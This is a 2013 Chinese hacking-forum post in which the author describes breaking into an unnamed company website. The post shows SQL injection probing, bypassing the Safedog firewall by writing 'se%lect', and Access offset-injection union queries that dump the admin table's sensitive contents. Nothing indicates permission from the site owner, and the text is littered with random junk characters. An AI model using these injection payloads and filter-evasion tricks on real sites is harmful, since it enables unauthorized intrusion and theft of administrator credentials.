中国网络渗透测试联盟

标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入 [打印本页]

作者: admin    时间: 2013-3-8 21:49
标题: 一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。
& W/ h& e4 m/ A3 C" j
4 B0 R7 W, ]* _+ ^( I/ q& A: W5 O, r# S6 N
顺手加个admin; l" F! w! O* I% o2 `

4 p% H+ p" I5 X8 O  t0 y  |& U  d0 {3 i; s+ W7 d9 |: h; {
默认后台。2 C2 J% H/ a* d% c3 U
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​7 _$ d# k0 {4 D1 Q) I$ q
1 W( f1 ~: K, G. w7 V
+ O4 E1 c! F9 K  N

6 l) i" L, W9 i7 R# r所以就不用御剑扫了,待会直接封IP。
" I# _+ p; y$ ?
- t, _" d# J# _) M& P4 F# }用order by语句判断是否存在注入。
5 s7 y- b, Z9 yhttp://www.xxx.com /product_show.asp?id=997 order by 1
1 `8 b5 O. W! S2 t9 j  {6 I. bhttp://www.xxx.com /product_show.asp?id=997 order by 100
8 b% t( g7 v( z# Y3 [3 O( D现在存在注入,经测试后发现是9个字段。
0 u+ g  y! q/ q# _
. Q# x  W% s' Z1 k, r接下来进行联合查询,猜是否存在admin表。
) H  K$ T9 Z+ l* k" Uhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
6 Q, d5 x( W9 Q9 R+ ^; v
- [3 [, Q7 Y6 l4 X  k) P4 R+ M2 A" l

+ L, S; ~' r9 j' ?在select中间加个%,se%lect绕过安全狗。
) o" x  p) [- v$ J+ S* e1 g  b7 Q- w
  q2 }% _% g, {2 W. r, l2 b
发现存在admin表,然后开始手工猜常用的字段。* x4 e% R) H# S, F! Y
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。5 k9 ^, A4 S1 S" Z. t7 \7 V

) o, v& ~( g0 K* Y" Q突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
6 P; R$ ^' ~' A4 \) U; y5 V
/ s0 G/ a+ _" P  N科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
- y+ V" C4 O. F% j7 K  J. e' Lhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin4 U- o1 ]% O, x- j
好了,敏感内容出显了。​% V0 x" K2 G& ]% `: S

" {9 i# v! B6 {) d4 ]  g* _- _" `/ X/ P1 {7 A1 g% c9 S# x

) o0 C- ^# h2 p6 ]+ h" J; F5 M& I




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2